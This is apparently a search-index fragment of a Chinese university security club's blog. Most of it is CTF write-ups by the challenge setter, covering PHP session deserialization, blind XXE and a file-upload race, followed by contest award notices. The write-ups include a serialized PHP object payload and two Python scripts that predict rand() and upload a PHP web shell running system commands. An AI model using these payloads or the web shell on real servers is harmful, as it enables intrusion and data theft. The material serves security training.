\u771f\u7684\u4ec0\u4e48\u90fd\u6ca1\u6709\u5417\n

\u6587\u4ef6\u662f\u4e2aword \u6253\u5f00\u770b\u53d1\u73b0\u4e00\u4e9b\u5947\u602a\u7684\u6362\u884c\u548ctab \u5f88\u5bb9\u6613\u60f3\u5230\u662f\u6469\u65af\u5bc6\u7801\uff0c\u66ff\u6362\u540e\u5f97\u5230

-.... -.. -.... ..-. -.... ...-- --... ....- -.... -.... --... -... ....- ..--- -.... -.-. ...-- ....- -.... . -.... -... ..... ..-. ...-- ----- --... ..--- ..... ..-. --... ....- -.... .---- -.... ..--- ...-- ..-. --... -..\n

\u89e3\u6469\u65af\u5bc6\u7801\uff0c\u7136\u540ehex\u8f6c\u5b57\u7b26\u4e32\u5f97\u5230flag

","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#web","title":"WEB","text":"","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#300","title":"\u767b\u5f55\u4e00\u54c8 300","text":"
\u767b\u5f55\u4e00\u4e0b\uff0c\u4f60\u5c31\u77e5\u9053\u3002\nhttp://111.230.32.124:6001/\n

\u6e90\u7801\u653e\u5230git\u91cc\u6cc4\u9732\u7ed9\u5927\u5bb6\u4e86 index.php

<?php\n    ini_set('session.serialize_handler', 'php_binary');\n    session_start();\n\n    if(isset($_POST['username']) && isset($_POST['password'])){\n        $username = $_POST['username'];\n        $password = $_POST['password'];\n        $_SESSION[\"username\"] = $username;\n        header(\"Location:./index.php\");\n    }\n    else if(isset($_SESSION[\"username\"])){\n        echo '<h1>hello '.$_SESSION[\"username\"].'</h1>';\n    }\n    else ...\n

flag.php

<?php\nsession_start();\nclass MOCTF{\n    public $flag;\n    public $name;\n    function __destruct(){\n        $this->flag = \"moctf{xxxxxxxxxxxxxxxx}\";\n        if($this->flag == $this->name){\n            echo \"Wow,this is flag:\".$this->flag;\n        }\n    }\n}\n

\u770b\u6e90\u7801\u5c31\u53ef\u4ee5\u77e5\u9053\u8fd9\u9053\u9898\u8003\u67e5\u7684\u662fsession\u53cd\u5e8f\u5217\u6f0f\u6d1e\u4e86 \u5728index.php\u4e2dphp\u7684\u5e8f\u5217\u5316handler\u662f\u2019php_binary\u2019\uff0c\u800cflag.php\u91cc\u6ca1\u6709\u8bbe\u7f6e\uff0c\u5c31\u662f\u9ed8\u8ba4\u7684\u2019php\u2019

ini_set('session.serialize_handler', 'php_binary');\n

\u53c2\u8003https://blog.spoock.com/2016/10/16/php-serialize-problem/ index.php\u4e2d\u7684$_session['username']\u53ef\u63a7\uff0c\u6211\u4eec\u5c31\u80fd\u6784\u9020payload\u5230session\uff0c \u7136\u540e\u8bbf\u95eeflag.php\u9875\u9762\u5c31\u80fd\u89e6\u53d1\u53cd\u5e8f\u5217\u5316\u6267\u884c__destruct\u4e86\uff0c \u8fd9\u91cc\u8fd8\u6709\u4e2a\u8003\u70b9\u662f$this->flag == $this->name\uff0c\u901a\u8fc7\u5f15\u7528\u7684\u65b9\u5f0f\u7ed5\u8fc7\u3002 \u6784\u9020payload

$a = new MOCTF();\n$a->name = &$a->flag;\necho '|'.serialize($a);\n
|O:5:\"MOCTF\":2:{s:4:\"flag\";N;s:4:\"name\";R:2;}\n

\u63d0\u4ea4\u5230index.php\u7684username\uff0c\u7136\u540e\u8bbf\u95eeflag.php\u5c31\u5f97\u5230flag\u4e86

","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#400","title":"\u5b57\u7b26\u4e32\u68c0\u67e5 400","text":"
\u6765\u68c0\u67e5\u4e00\u4e0b\u4f60\u7684\u5b57\u7b26\u4e32\u662f\u5426\u683c\u5f0f\u826f\u597d\u5427\uff01\nhttp://111.230.32.124:6002/\n

\u539f\u610f\u662fxxe\u6f0f\u6d1e\u8bfb\u53d6\u4efb\u610f\u6587\u4ef6 \u540e\u6765\u77e5\u9053\u5e08\u5085\u4eec\u5361\u4e86\u5f88\u4e45\u8c8c\u4f3c\u662f\u56e0\u4e3aclient-ip\u7684\u539f\u56e0\uff0c\u6211\u7684\u9505 \u9898\u76ee\u6253\u5f00\u662f\u4e2ajson\u5b57\u7b26\u4e32\u9a8c\u8bc1\u7684\u9875\u9762\uff0cPOST\u5305\u7684Content-Type\u5b57\u6bb5\u662fapplication/json\uff0c POST\u540e\u63a5\u53e3\u4f1a\u8fd4\u56dejson\u683c\u5f0f\u6b63\u786e\u6216\u9519\u8bef\u7684\u7ed3\u679c \u6539\u6210application/xml\uff0c\u63a5\u53e3\u63d0\u793a\u53ea\u5141\u8bb8\u672c\u673a\u8bbf\u95ee\uff0c\u4e8e\u662f\u6784\u9020

client-ip:localhost\n

\u7136\u540e\u5c31\u662fxxe\u76f2\u6253\u6f0f\u6d1e\u4e86\uff0c\u53c2\u8003https://security.tencent.com/index.php/blog/msg/69 \u8fd9\u91cc\u6211\u53ea\u9650\u5236\u4e86payload\u957f\u5ea6\u4e3a170\u4ee5\u5185\uff0c\u5176\u5b9e\u5b8c\u5168\u53ef\u4ee5\u66f4\u77ed\u7684\uff0c\u5e0c\u671b\u5927\u4f6c\u4eec\u53ef\u4ee5\u6d4b\u8bd5\u6d4b\u8bd5 \u6700\u540eflag\u5728/etc/passwd

","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#400_1","title":"\u7b80\u5355\u5ba1\u8ba1 400","text":"
\u4ee3\u7801\u90fd\u7ed9\u4f60\u4e86\uff0c\u8fd8\u8bf4\u4e0d\u4f1a\u505a\uff1f\nhttp://120.78.57.208:6005/\n

index.php

<?php\nerror_reporting(0);\ninclude('config.php');\nheader(\"Content-type:text/html;charset=utf-8\");\nfunction get_rand_code($l = 6) {\n    $result = '';\n    while($l--) {\n        $result .= chr(rand(ord('a'), ord('z')));\n    }\n    return $result;\n}\n\nfunction test_rand_code() {\n    $ip=$_SERVER['REMOTE_ADDR'];\n    $code=get_rand_code();\n    $socket = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);\n    @socket_connect($socket, $ip, 8888);\n    @socket_write($socket, $code.PHP_EOL);\n    @socket_close($socket);\n    die('test ok!');\n}\n\nfunction upload($filename, $content,$savepath) {\n    $AllowedExt = array('bmp','gif','jpeg','jpg','png');\n    if(!is_array($filename)) {\n        $filename = explode('.', $filename);\n    }\n    if(!in_array(strtolower($filename[count($filename)-1]),$AllowedExt)){\n        die('error ext!');\n    }\n    $code=get_rand_code();\n    $finalname=$filename[0].'moctf'.$code.\".\".end($filename);\n    file_put_contents(\"$savepath\".$finalname, $content);\n    usleep(3000000);\n    unlink(\"$savepath\".$finalname);\n    die('upload over!');\n}\n\n$savepath=\"uploads/\".sha1($_SERVER['REMOTE_ADDR']).\"/\";\nif(!is_dir($savepath)){\n    $oldmask = umask(0);\n    mkdir($savepath, 0777);\n    umask($oldmask);\n}\nif(isset($_GET['action']))\n{\n    $act=$_GET['action'];\n    if($act==='upload')\n    {\n        $filename=$_POST['filename'];\n        if(!is_array($filename)) {\n            $filename = explode('.', $filename);\n        }\n        $content=$_POST['content'];\n        waf($content);\n        upload($filename,$content,$savepath);\n    }\n    else if($act==='test')\n    {\n        test_rand_code();\n    }\n}\nelse {\n    highlight_file('index.php');\n}\n?>\n

\u89e3\u91ca\u4e00\u4e0b\u9898\u76ee\u7684\u610f\u601d \u6839\u636eaction\u6267\u884c\u5bf9\u5e94\u64cd\u4f5c\uff0caction=test\u4f1a\u8c03\u7528test_rand_code\u51fd\u6570\u53d1\u9001tcp\u5305\u5230\u8bbf\u5ba2\u7684ip action=upload\u65f6\u4f1a\u5199\u5165\u4e00\u4e2a\u6587\u4ef6\uff0c\u6587\u4ef6\u5185\u5bb9\u6709waf\u62e6\u622a\uff0c\u6587\u4ef6\u540d\u6709\u767d\u540d\u5355\u9650\u5236\u540e\u7f00\uff0c \u7136\u540e\u62fc\u63a5\u6587\u4ef6\u540d\u52a0\u5165rand\u7684\u5b57\u7b26\u4e32\uff0c\u5199\u5165\u6587\u4ef6\uff0c\u6587\u4ef6\u5199\u5165\u540e\u8fc73\u79d2unlink\u5220\u9664 \u6709\u95ee\u9898\u7684\u70b9\u6709\u8fd9\u51e0\u4e2a 1.filename\u68c0\u67e5\u662f\u7528$filename[count($filename)-1]\u53d6\u7684\u540e\u7f00\uff0c\u662f\u6309\u7167\u4e0b\u6807\u53d6\u7684\uff0c\u800c\u5199\u5165\u6587\u4ef6\u65f6\u7528\u7684\u662fend($filename)\uff0c\u662f\u53d6\u6700\u540e\u4e00\u4e2a\u5143\u7d20\uff0c\u53ea\u8981post\u65f6\u63d0\u4ea4filename[1]=jpg&filename[0]=php\u5c31\u80fd\u7ed5\u8fc7\u4e86 2.$content\u7684waf\u7ed5\u8fc7\uff0c \u7ed5\u8fc7\u5373\u53ef 3.\u4f7f\u7528rand()\u751f\u6210\u968f\u673a\u6570\uff0c\u53ef\u4ee5\u88ab\u9884\u6d4b\uff0c\u53c2\u8003https://www.sjoerdlangkemper.nl/2016/02/11/cracking-php-rand/

\u9884\u671f\u89e3\u6cd5\u662f 1.username\u6570\u7ec4bypass\u540e\u7f00\u68c0\u67e5\uff0c\u7ed5\u8fc7content\u7684waf 2.rand\u968f\u673a\u6570\u9884\u6d4b+\u7206\u7834\u6587\u4ef6\u540d \u5728unlink\u4e4b\u524d\u8bbf\u95eeshell \u7ed3\u679c\u5927\u4f6c\u4eec\u76f4\u63a5\u975e\u9884\u671f\u89e3bypass\u4e86unlink\u6253\u6270\u4e86 \u975e\u9884\u671f\u89e3\u53c2\u8003\u4e00\u53f6\u98d8\u96f6\u5e08\u5085\u7684WriteUp \u9884\u671f\u89e3\u5982\u4e0b \u5199\u4e24\u4e2a\u811a\u672c\uff0c listen.py

#\u76d1\u542c8888\u7aef\u53e3\uff0c\u63a5\u53d76\u4e2a`get_rand_code`\u7684\u7ed3\u679c\uff0c\u7136\u540e\u9884\u6d4b\u63a5\u4e0b\u6765\u4e00\u6b21`get_rand_code`\u7684\u7ed3\u679c\uff0c\u8fd9\u91cc\u53ef\u80fd\u4e0d\u4f1a\u5f88\u51c6\u786e\uff0c\n#\u6240\u4ee5\u9700\u8981\u5c0f\u5e45\u5ea6\u7206\u7834\uff0c\u590d\u6742\u5ea6\u5927\u6982\u4e3a3^6\uff0c\u53cd\u6b63\u5c31\u8dd1\u7740\u5457\n\n#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n#by xishir\nimport requests as req\nimport re\nfrom socket import *  \nfrom time import ctime  \nimport random\nimport itertools as its\nimport hashlib\n\nr=req.session()\nurl=\"http://120.78.57.208:6005/\"\n\n\ndef get_rand_list():\n    HOST = ''  \n    PORT = 8888\n    BUFSIZ = 128  \n    ADDR = (HOST, PORT)  \n    tcpSerSock = socket(AF_INET, SOCK_STREAM)\n    tcpSerSock.bind(ADDR)\n    tcpSerSock.listen(5)\n    rand_num=0\n    l=[]\n    while True:\n        tcpCliSock, addr = tcpSerSock.accept()  \n        while True:  \n            data = tcpCliSock.recv(BUFSIZ)  \n            if not data:  \n                break  \n            data=data[0:6]\n        print data,l\n            for i in data:\n                l.append(ord(i)+1-ord('a'))\n        rand_num+=1\n        if rand_num==6:\n            break\n    tcpCliSock.close()  \n    tcpSerSock.close()\n    return l\n\ndef get_salt(l):\n    salt=\"\"\n    for i in range(6):\n        j=len(l)\n        r=(l[j-3]+l[j-31])-1\n        if r>26:\n            r-=26\n        #print l[j-3],chr(l[j-3]+ord('a')-1),l[j-31],chr(l[j-31]+ord('a')-1),r,chr(r+ord('a')-1)\n        l.append(r)\n        salt+=chr(r+ord('a')-1)\n        #print salt\n    return salt\n\ndef get_flag(salt):\n    s=hashlib.sha1('119.23.73.3').hexdigest()\n    url1=url+'/uploads/'+s+'/'+'moctf'+salt+'.php'\n    data={\"a\":\"system('cat ../../flag.php');echo '666666';\"}\n    r2=r.post(url1,data=data)\n    print salt\n    if '404' not in r2.text:\n        print 
r2.text\n\nget_flag('aaaaaa')\nl=get_rand_list()\nsalt=get_salt(l)\ns=0\nfor i in range(100000):\n    s=s+1\nprint s\nwords = \"10\"\no=its.product(words,repeat=6)\nfor i in o:\n    s=\"\".join(i)\n    salt2=\"\"\n    for j in range(6):\n        salt2+=chr(ord(salt[j])-int(s[j]))\n    get_flag(salt2)\nwords = \"10\"\no=its.product(words,repeat=6)\nfor i in o:\n    s=\"\".join(i)\n    salt2=\"\"\n    for j in range(6):\n        salt2+=chr(ord(salt[j])+int(s[j]))\n    get_flag(salt2)\n

put.py

#\u901a\u8fc7`?action=test`\u8c03\u7528`test_rand_code`\u51fd\u6570\u53d1\u90016\u6b21`get_rand_code`\u7ed3\u679c\uff0c\u4e00\u517136\u4e2a\u5b57\u7b26\uff0c\n#\u7136\u540e\u63d0\u4ea4\u4e00\u4e2a\u6784\u9020\u597d\u7684`?action=test`\uff0c\u4e0a\u4f20shell\u5230\u670d\u52a1\u5668\uff0c\u5728\u88ab\u5220\u9664\u4e4b\u524d\u5c31\u4f1a\u88ablisten\u7206\u7834\u5f97\u5230\uff0c\u6ca1\u7206\u7834\u5230\u5c31\u591a\u7206\u7834\u51e0\u6b21\n\n#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n#by xishir\nimport requests as req\nimport re\n\nr=req.session()\nurl=\"http://120.78.57.208:6005/?action=\"\n\n\ndef get_test():\n    url2=url+\"test\"\n    r1=r.get(url2)\n    print url2\n    print r1.text\ndef upload():\n    data={\"filename[4]\":\"jpg\",\n          \"filename[2]\":\"jpg\",\n          \"filename[1]\":\"php\",\n          \"content\":\"<script language='php'>assert($_POST[a]);</script>\",\n          \"a\":\"system('cat ../../flag.php');\"\n          }\n    url1=url+\"upload\"\n    r2=r.post(url1,data=data)\n    print r2.text\n\nfor i in range(6):\n    get_test()\nupload()\n

\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b

","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#_2","title":"\u611f\u60f3","text":"

\u8bb2\u4e00\u4e0b\u8fd9\u6b21\u6bd4\u8d5b\u6211\u4e3b\u8981\u5e72\u4e86\u90a3\u4e9b\u4e8b\u5427

  1. \u51fa\u9898\uff0c\u5982\u4e0a\u6240\u8ff0
  2. \u5e73\u53f0\u642d\u5efa\uff0c\u7528\u7684\u662fctfd\uff0cdocker\u7684\u65b9\u5f0f\u642d\u5efa\u7684\uff0c\u7701\u4e86\u5f88\u591a\u4e8b
  3. \u9898\u76ee\u90e8\u7f72\uff0c\u9664\u4e86ping\u90a3\u9898\uff0c\u5176\u4ed6\u7684web\u90fd\u662f\u6211\u90e8\u7f72\u7684\uff0c\u5c24\u5176\u662fcms\u90a3\u9898\uff0c\u53cd\u590d\u90e8\u7f72\u7684\u6709\u70b9\u5410\uff0c\u4e2d\u95f4\u6709\u4e2a\u96c6\u5927\u5b66\u5f1f\u6765\u5e2e\u5fd9\uff0c\u540e\u9762\u6bd4\u8d5b\u7684\u65f6\u5019\u8fd8\u662f\u51fa\u4e86\u95ee\u9898
  4. \u53d1\u5e03\u9898\u76ee\uff0cemmmmmmmmmm\uff0c\u7528ctfd\u7684\u65f6\u5019\u51fa\u73b0\u4e86\u5f88\u795e\u5947\u7684\u60c5\u51b5\uff0c\u5728\u7f16\u8f91config\u7684\u65f6\u5019\u4f7f\u7528\u8c37\u6b4c\u7684\u81ea\u52a8\u7ffb\u8bd1\uff0c\u4fdd\u5b58\u4e4b\u540ectfd\u7684web\u670d\u52a1\u5c31\u6302\u6389\u5566\uff01\u662f\u4e2a\u5de8\u5751\uff0c\u73b0\u5728\u8fd8\u4e0d\u77e5\u9053\u548b\u56de\u4e8b
  5. \u6bd4\u8d5b\u65f6\u5019\u7684\u653e\u9898\uff0c\u653ehint\uff0c\u8fd0\u7ef4\uff0c\u6c34\u7fa4\uff0c\u54c8\u54c8\u54c8\u54c8\u548c\u5927\u4f6c\u4eec\u73a9\u800d\u8fd8\u662f\u5f88\u5f00\u5fc3\u7684 \u653e\u4e00\u4e9b\u540e\u53f0\u6570\u636e

\u539f\u6765\u53ea\u662f\u60f3\u7ed9\u6211\u4eec\u5b66\u6821\u548c\u96c6\u5927\u7684\u5b66\u5f1f\u4eec\u4f53\u9a8c\u6bd4\u8d5b\u7684\uff0c\u4e0d\u8fc7\u5bf9\u5916\u5f00\u653e\u4e5f\u5438\u5f15\u4e86\u8bb8\u591a\u5e08\u5085\u4eec\u6765\u505a\u9898\uff0c\u867d\u7136\u8fd0\u7ef4\u5f97\u5f88\u7d2f\uff0c\u4f46\u4e5f\u5b66\u5230\u4e86\u5f88\u591a\u4e1c\u897f\uff08\u4e3b\u8981\u662f\u975e\u9884\u671f\u548c\u90e8\u7f72\u5404\u79cd\u5947\u8469\u73af\u5883\uff09 \u6253\u4e00\u6ce2\u5e7f\u544a\uff0chttp://www.moctf.com/ MOCTF\u5e73\u53f0\u662fCodeMonster\u548cMokirin\u8fd9\u4e24\u652fCTF\u6218\u961f\u6240\u642d\u5efa\u7684\u4e00\u4e2aCTF\u5728\u7ebf\u7b54\u9898\u7cfb\u7edf\u3002\u9898\u76ee\u5f62\u5f0f\u4e0e\u5404\u5927CTF\u6bd4\u8d5b\u76f8\u540c\u3002\u76ee\u7684\u662f\u4e3a\u4e24\u4e2a\u5b66\u6821\u4e2d\u70ed\u7231\u4fe1\u606f\u5b89\u5168\u7684\u540c\u5b66\u4eec\u63d0\u4f9b\u4e00\u4e2a\u5237\u9898\u7684\u5e73\u53f0\uff0c\u80fd\u591f\u4e00\u8d77\u5b66\u4e60\u3001\u8fdb\u6b65\u3002

\u6700\u540e\u795d\u5927\u5bb6\u65b0\u5e74\u5feb\u4e50\uff01

","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/ab21d401-10e1-4021-9936-e7154fd9ed71/","title":"\u4e3e\u529e\u7b2c\u4e8c\u5c4a\u53a6\u95e8\u7406\u5de5\u201c\u56fd\u79d1-i\u6625\u79cb\u676f\u201d\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b","text":"

\u4e3a\u5e2e\u52a9\u5b66\u751f\u66f4\u597d\u5730\u611f\u77e5\u3001\u4e86\u89e3\u8eab\u8fb9\u7684\u7f51\u7edc\u5b89\u5168\u98ce\u9669\uff0c\u589e\u5f3a\u7f51\u7edc\u5b89\u5168\u610f\u8bc6\uff0c\u666e\u53ca\u7f51\u7edc\u5b89\u5168\u77e5\u8bc6\uff0c\u63d0\u9ad8\u7f51\u7edc\u5b89\u5168\u9632\u62a4\u6280\u80fd\uff0c\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u8ba1\u7b97\u673a\u4e0e\u4fe1\u606f\u5de5\u7a0b\u5b66\u9662\u7279\u6b64\u4e3e\u529e\u201c\u56fd\u79d1-i\u6625\u79cb\u676f\u201d\u7b2c\u4e8c\u5c4a\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b\uff0c\u4ee5\u6b64\u6380\u8d77\u5b66\u751f\u201c\u5171\u5efa\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u3001\u5171\u4eab\u7f51\u7edc\u6587\u660e\u5b66\u6821\u201d\u7684\u70ed\u6f6e\u3002

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/b6adcea6-60ce-4f44-9389-2a06d34125d8/","title":"\u201c\u767e\u8d8a\u676f\u201d\u7b2c\u56db\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e00\u7b49\u5956","text":"

\u4e3a\u8d2f\u5f7b\u843d\u5b9e\u4e2d\u592e\u7f51\u4fe1\u529e\u7b49\u516d\u90e8\u95e8\u300a\u5173\u4e8e\u52a0\u5f3a\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u5efa\u8bbe\u548c\u4eba\u624d\u57f9\u517b\u7684\u610f\u89c1\u300b\uff08\u4e2d\u7f51\u529e\u53d1\u6587\u30142016\u30154\u53f7\uff09\u7cbe\u795e\uff0c\u52a0\u5feb\u9ad8\u6821\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u4e13\u4e1a\u5efa\u8bbe\uff0c\u521b\u65b0\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u673a\u5236\uff0c\u7701\u6559\u80b2\u5385\u3001\u7701\u7f51\u5b89\u529e\u51b3\u5b9a\u8054\u5408\u4e3e\u529e\u7b2c\u4e09\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d\u3002

\u672c\u534f\u4f1a\u6d3e\u51fa\u7684CodeMonster\u6218\u961f\u5168\u7701\u7b2c\u4e8c\u593a\u5f97\u4e8c\u7b49\u5956\u3002

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/bb168e48-791c-4a1d-83c4-335b9db12499/","title":"2018 \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u798f\u5efa\u8d5b\u533a \u4e00\u7b49\u5956\uff08\u7b2c2\u540d\uff09","text":"

2018\u5e745\u670811\u65e5\uff0c\u7531\u6559\u80b2\u90e8\u5b66\u6821\u89c4\u5212\u5efa\u8bbe\u53d1\u5c55\u4e2d\u5fc3\u3001\u4e2d\u56fd\u4fe1\u606f\u5b89\u5168\u6d4b\u8bc4\u4e2d\u5fc3\u4e3b\u529e\uff0c\u6559\u80b2\u90e8\u9ad8\u7b49\u5b66\u6821\u4fe1\u606f\u5b89\u5168\u4e13\u4e1a\u6559\u5b66\u6307\u5bfc\u59d4\u5458\u4f1a\u534f\u529e\uff0c\u4e2d\u56fd\u4fe1\u606f\u4ea7\u4e1a\u5546\u4f1a\u4fe1\u606f\u5b89\u5168\u4ea7\u4e1a\u5206\u4f1a\u3001\u5317\u4eac\u897f\u666e\u9633\u5149\u6559\u80b2\u79d1\u6280\u80a1\u4efd\u6709\u9650\u516c\u53f8\u3001\u798f\u5dde\u5927\u5b66\u627f\u529e\u76842017-2018\u5168\u56fd\u9ad8\u6821\u201c\u897f\u666e\u676f\u201d\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u7b2c\u4e03\u5206\u533a\u8d5b\u5728\u798f\u5dde\u5927\u5b66\u62c9\u5f00\u5e37\u5e55\uff0c\u6709\u6765\u81ea\u798f\u5efa\u5171\u8ba121\u6240\u9ad8\u6821\u8fd1100\u540d\u5b66\u751f\u540c\u573a\u7ade\u6280\u3002\u7ecf\u8fc7\u4e00\u5929\u7684\u7cbe\u5f69\u89d2\u9010\uff0c\u798f\u5efa\u519c\u6797\u5927\u5b66\u529b\u514b\u7fa4\u96c4\uff0c\u593a\u5f97\u7b2c\u4e03\u8d5b\u533a\u51a0\u519b\uff0c\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u3001\u95fd\u5357\u5e08\u8303\u5927\u5b66\u5206\u522b\u83b7\u5f97\u4e9a\u519b\u548c\u5b63\u519b\u3002

"},{"location":"posts/dfd03705-8ad1-420f-8534-0fd4086165e7/","title":"2017 XNUCA\u7b2c\u4e00\u671fWeb\u4e13\u9898 \u7b2c9\u540d","text":"

\u201c\u5168\u56fd\u9ad8\u6821\u7f51\u5b89\u8054\u8d5b(National University Cybersecurity Association\uff0c\u7b80\u79f0X-NUCA)\u201d\u662f\u9762\u5411\u5168\u56fd\u9ad8\u6821\u5b66\u751f\u7684\u7f51\u7edc\u5b89\u5168\u6280\u80fd\u7ade\u8d5b\uff0c\u9996\u5c4a\u6bd4\u8d5b\u5df2\u4e8e2016\u5e747\u670831\u65e5\u4e3e\u529e\uff0c\u5927\u8d5b\u79c9\u627f\u201c\u5bd3\u5b66\u4e8e\u8d5b\uff0c\u4ee5\u8d5b\u4fc3\u5b66\u201d\u7684\u7406\u5ff5\uff0c\u63a8\u51fa\u201c\u7ade\u8d5b+\u201d\u6a21\u5f0f\uff0c\u5c06\u8d5b\u524d\u6307\u5bfc\u3001\u8d5b\u4e2d\u953b\u70bc\u548c\u8d5b\u540e\u4ea4\u6d41\u4e09\u8005\u6709\u673a\u7ed3\u5408\uff0c\u65e8\u5728\u66f4\u597d\u5730\u4fc3\u8fdb\u56fd\u5bb6\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u7684\u57f9\u517b\u548c\u9009\u62d4\u3002 X-NUCA\u8054\u8d5b\u9762\u5411\u5168\u56fd\u5728\u6821\u5b66\u751f\uff0c\u5305\u62ec\u4e13\u79d1\u751f\u3001\u672c\u79d1\u751f\u3001\u7855\u58eb\u751f\u548c\u535a\u58eb\u751f\uff0c\u9700\u7531\u6307\u5bfc\u8001\u5e08\u5e26\u961f\u53c2\u8d5b\u30022017\u8d5b\u5b63\u5206\u4e3a\u4e13\u9898\u8d5b\u548c\u603b\u51b3\u8d5b\u4e24\u4e2a\u9636\u6bb5\uff0c\u9996\u6b21\u4e13\u9898\u8d5b2017\u5e748\u670826\u65e5\u4e3e\u529e\u3002\u4e13\u9898\u8d5b\u5305\u542b3\u671f\u7ebf\u4e0a\u8d5b\uff0c\u5206\u522b\u57288\u670826\u65e5\u300110\u67088\u65e5\u300111\u670825\u65e5\u4e3e\u529e\uff0c12\u6708\u4e3e\u529e\u603b\u51b3\u8d5b\u5e76\u9881\u5956\u3002 
X-NUCA\u8054\u8d5b\u63a8\u51fa\u7684\u201c\u7ade\u8d5b+\u201d\u6a21\u5f0f\u901a\u8fc7\u5f15\u5165\u8d5b\u524d\u6307\u5bfc\u548c\u8d5b\u540e\u4ea4\u6d41\u73af\u8282\uff0c\u4f7f\u53c2\u8d5b\u9009\u624b\u4e0d\u4ec5\u53ef\u4ee5\u6bd4\u8d5b\uff0c\u8fd8\u53ef\u4ee5\u6709\u9488\u5bf9\u6027\u7684\u5b66\u4e60\u3002\u5728\u201c\u7ade\u8d5b+\u201d\u6a21\u5f0f\u4e2d\uff0c\u6bd4\u8d5b\u961f\u4f0d\u5e38\u89c4\u5316\u3001\u6bd4\u8d5b\u6d3b\u52a8\u5e38\u89c4\u5316\uff0c\u7c7b\u4f3c\u4e8e\u201cNBA\u201d\u6a21\u5f0f\u3002\u5728\u8fd9\u79cd\u6a21\u5f0f\u4e0b\uff0c\u53c2\u8d5b\u961f\u4f0d\u8363\u8a89\u611f\u66f4\u5f3a\uff0c\u4eba\u624d\u7684\u5f52\u5c5e\u611f\u66f4\u5f3a\uff0c\u66f4\u5bb9\u6613\u548c\u9ad8\u6821\u6b63\u89c4\u7684\u4eba\u624d\u57f9\u517b\u4f53\u7cfb\u76f8\u7ed3\u5408\u3002X-NUCA\u8054\u8d5b\u529b\u56fe\u5c06\u7ade\u8d5b\u5e73\u53f0\u3001\u5b66\u4e60\u5e73\u53f0\u3001\u4ea4\u6d41\u5e73\u53f0\u548c\u53c2\u8d5b\u56e2\u961f\u56db\u8005\u7d27\u5bc6\u8fde\u63a5\uff0c\u52aa\u529b\u843d\u5b9e\u201c\u5bd3\u5b66\u4e8e\u8d5b\uff0c\u4ee5\u8d5b\u4fc3\u5b66\u201d\u7684\u7406\u5ff5\uff0c\u65e8\u5728\u4fc3\u8fdb\u4e2d\u56fd\u9ad8\u6821\u7f51\u5b89\u6559\u5b66\u6c34\u5e73\u7684\u63d0\u9ad8\u548c\u7f51\u5b89\u4eba\u624d\u7684\u53d1\u73b0\u3002

\u6211\u4eec\u534f\u4f1a\u7684CodeMonster\u6218\u961f\u9996\u6b21\u53c2\u52a0\u672c\u6b21\u6bd4\u8d5b\uff0c\u53d6\u5f97\u4e86\u7ebf\u4e0a\u8d5b\u5168\u56fd\u7b2c9\u540d\u7684\u6210\u7ee9\u3002

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/dfd03705-8ad1-420f-8534-0fd4086165e7/#_1","title":"\u6bd4\u8d5b\u56fe\u7247","text":"

\u6bd4\u8d5b\u671f\u95f4\u622a\u56fe,\u4e00\u5ea6\u5360\u9886\u699c\u4e00\uff1a

","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/f72cbee7-1294-46b9-92e3-49a3140255b2/","title":"2017 \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u4f01\u4e1a\u8d5b\u534e\u5357\u8d5b\u533a \u4e09\u7b49\u5956\uff08\u7b2c3\u540d\uff09","text":"

